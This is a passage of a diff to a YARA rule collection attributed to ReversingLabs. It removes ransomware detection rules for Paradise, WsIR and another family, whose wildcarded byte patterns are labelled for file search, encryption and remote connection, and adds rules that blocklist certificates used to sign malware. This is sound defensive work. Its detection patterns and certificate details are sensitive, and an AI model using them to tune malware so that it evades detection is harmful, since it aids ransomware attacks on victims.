-            FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 7D ?? 57 56 FF 93 ?? ?? ?? ?? 85 C0 74
-            ?? 57 8D BB ?? ?? ?? ?? 89 07 5F EB ?? 8D B3 ?? ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ??
-            89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? EB ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 57 FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
-            57 FF 93 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 50 57 FF 93 ?? ?? ?? ?? 85
-            C0 74 ?? C6 00 ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8D 93 ?? ??
-            ?? ?? FF 75 ?? 52 51 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 4D ?? 51 57 E8 ??
-            ?? ?? ?? 85 C0 74 ?? 89 45 ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF
-            93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 89 85 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ??
-            ?? 8B 45 ?? 8B 75 ?? 89 06 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 83 BD ??
-            ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 83 ?? ?? ?? ?? 50 56 FF
-            93 ?? ?? ?? ?? 85 C0 74 ?? 40 57 8D BB ?? ?? ?? ?? 89 07 5F E9 ?? ?? ?? ?? 8D B3 ??
-            ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 83 ?? ?? ?? ?? 8B 00 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ??
-            ?? ?? C9 C2
-        }
-		$crypto_file = {
-            55 89 E5 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? E8
-            ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 85 C0 74 ?? 89 45 ?? 8D 83 ?? ?? ?? ?? 8B 00
-            85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 4D ?? 51 56 57 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            89 45 ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? FF 75 ??
-            FF 93 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 45
-            ?? 8B 5D ?? C9 C2
-        }
-		$crypt_file = {
-            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            5B 8D BD ?? ?? ?? ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D B3 ?? ?? ??
-            ?? 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 89 45 ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 30 FF 93 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 6A ??
-            FF 31 50 FF 36 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 8D B5 ?? ?? ?? ?? 51 6A ?? FF 36 68 ?? ?? ?? ?? FF 30 FF 93 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45
-            ?? 6A ?? FF 75 ?? FF 93 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
-            75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8D 7D ?? 8D 75 ?? 8D 55
-            ?? 52 56 57 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 6A ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 7D ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 57 FF 75 ?? 6A ?? 6A
-            ?? 6A ?? FF 36 FF 93 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 75 ??
-            FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 55 ?? 52 56 57
-            FF 75 ?? FF 93 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D B3 ??
-            ?? ?? ?? FF 06 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 50 FF 93 ?? ?? ?? ??
-            83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
-        }
-		$enum_files_1 = {
-            89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B E8 ??
-            ?? ?? ?? 8D 7D ?? 6A ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D 7D ?? 57 FF 93 ?? ?? ?? ??
-            83 F8 ?? 74 ?? EB ?? 8D 75 ?? 56 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
-        }
-		$enum_files_2 = {
-            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            66 C7 45 ?? ?? ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56
-            FF 75 ?? FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ??
-            0F 84 ?? ?? ?? ?? 89 45 ?? 6A ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 55 ?? 8D B5
-            ?? ?? ?? ?? 52 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 55 ?? 8D B5 ?? ?? ?? ?? 52
-            56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 40 89 45 ?? 8D BD
-            ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 03 45 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 FF 75
-            ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 56 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? A9 ?? ?? ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? E8 ?? ?? ?? ??
-            EB ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75
-            ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ??
-            ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF
-            75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74
-            ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $enum_files_1 and $enum_files_2 and $crypto_file and $crypt_file and $remote_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAS Avto, d.o.o." and ( pe.signatures [ i ] . serial == "00:b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" or pe.signatures [ i ] . serial == "b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" ) and 1615507200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Paradise : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Paradise ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9a92a05c-5f26-59ed-9934-a24bb7c31d8d"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "a93b0a98-cfec-5e32-9fd8-b3d6c4353558"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Paradise.yara#L1-L81"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12198-L12216"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fc029bee999ec72416ac91d8386d4d270070035ad078bcab1dec11eea032c10b"
+		logic_hash = "fc840c0b37867c3b0aa80d4dc609feaaab77d3f0c6f84c8bb2ea7c5a6461ebb8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Paradise"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            53 56 57 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 89 75 ?? 85 F6
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 56 FF
-            D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 83 65 ?? ?? 8B 45 ?? 8B 74 85 ?? 8D 95 ?? ?? ?? ?? 85 F6 74 ?? 0F B7 02 83 F8
-            ?? 72 ?? 8D 48 ?? 83 F8 ?? 76 ?? 8B C8 0F B7 06 83 F8 ?? 72 ?? 83 F8 ?? 77 ?? 83 C0
-            ?? 3B C8 0F B7 02 75 ?? 66 85 C0 74 ?? 83 C2 ?? 83 C6 ?? EB ?? 0F B7 02 EB ?? 66 3B
-            06 1B C0 83 E0 ?? 40 EB ?? 33 C0 85 C0 0F 84 ?? ?? ?? ?? FF 45 ?? 83 7D ?? ?? 72 ??
-            8B 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 56 FF D7 83 C4 ?? F6 85 ??
-            ?? ?? ?? ?? 74 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 80 3D ?? ?? ?? ?? ?? 74 ?? BA
-            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? EB ?? F6 85 ?? ?? ??
-            ?? ?? 74 ?? A1 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            85 C0 75 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ??
-            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? 53 FF 75 ?? FF D7 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ??
-            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
-        }
-		$encrypt_files_p1 = {
-            56 57 6A ?? BE ?? ?? ?? ?? 5F E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 C6 ?? 4F 75 ?? 33 F6 39 75 ?? 74 ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 0F
-            B7 88 ?? ?? ?? ?? 56 56 51 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 59 89 4D
-            ?? 33 C0 8A 90 ?? ?? ?? ?? 88 90 ?? ?? ?? ?? 3B C6 75 ?? 33 C0 40 3B C1 72 ?? 68 ??
-            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 5F 5E C9 C3 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15
-        }
-		$encrypt_files_p2 = {
-            53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB
-            53 53 8D 44 24 ?? 50 89 5C 24 ?? FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 44
-            24 ?? 50 FF D6 85 C0 75 ?? 89 5C 24 ?? 39 5C 24 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 0F B6 80 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            74 24 ?? E8 ?? ?? ?? ?? 59 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 53 53
-            53 53 C6 05 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 88 1D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 33 C0 88 98 ?? ?? ?? ?? 3B C3 75 ?? 33 C0 40 83 F8 ?? 72 ?? 6A ?? 5E
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 53 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 4E 75 ?? 8B 3D ??
-            ?? ?? ?? 81 C7 ?? ?? ?? ?? 6A ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 75 ?? 57 E8
-            ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
-        }
-		$http_remote_connection = {
-            53 56 57 FF 75 ?? 33 FF 8D 75 ?? 89 7D ?? E8 ?? ?? ?? ?? 59 89 7D ?? 57 57 57 FF 75
-            ?? 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 FF 75 ??
-            FF 75 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? 57
-            0F 95 C1 B8 ?? ?? ?? ?? 49 23 C8 03 C8 51 57 57 57 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B D8 3B DF 74 ?? 57 57 57 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33
-            F6 57 57 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C6 3B C7
-            75 ?? 89 7D ?? EB ?? 50 39 7D ?? 75 ?? E8 ?? ?? ?? ?? 59 EB ?? FF 75 ?? 6A ?? FF 15
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 C6 50 53
-            FF 15 ?? ?? ?? ?? 03 75 ?? 39 7D ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 7D ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B
-            C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and $http_remote_connection and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and ( pe.signatures [ i ] . serial == "00:e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" or pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" ) and 1647302400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Wsir : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WsIR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cb4ab736-9421-5b92-b4a5-c5db0b61725a"
-		date = "2022-08-02"
-		modified = "2022-08-02"
+		id = "df6e1403-c300-5d97-b57d-dc70d61b2229"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WsIR.yara#L1-L73"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12218-L12234"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c22c01f93945c7721ebfe5e7a09c3bf2b9d0ad95740bc0a76b4e61741f61d82c"
+		logic_hash = "67a975f2806825bf0da27fcaf33c2ff497fe9bb2af12c22ff505b49070516960"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WsIR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53
-            55 8B E9 8D 4C 24 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 8B 41 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 00
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 85 C0 0F 95 C3 E8 ?? ?? ?? ??
-            84 DB 74 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8
-            ?? ?? ?? ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75
-            ?? 8D 4C 24 ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8B B4 24 ?? ??
-            ?? ?? 57 8B 3D ?? ?? ?? ?? BB ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 54 24 ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 45 ?? 8D 54 24 ?? 52 6A ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 4C 24 ?? 89 5C 24 ?? FF D7 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 56 6A ?? 68
-            ?? ?? ?? ?? 51 FF D7 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
-            5E 8B 8C 24 ?? ?? ?? ?? 5D 5B 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
-        }
-		$encrypt_files = {
-            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
-            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
-            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ??
-            E9
-        }
-		$exec_proc = {
-            52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ??
-            ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 85 F6 75 ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8D 74 04 ?? EB ?? 8D 57 ??
-            8D 4C 24 ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 4C 24
-            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 EB ?? C6 06 ?? 68 ?? ?? ??
-            ?? 56 FF D3 8B 44 24 ?? 50 56 FF D3 8D 4C 24 ?? 55 51 FF 15 ?? ?? ?? ?? 8B F0 33 D2
-            83 FE ?? 0F 9F C2 8D 4C 24 ?? 8B F2 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            5D 8B C6 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" and 1621900800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
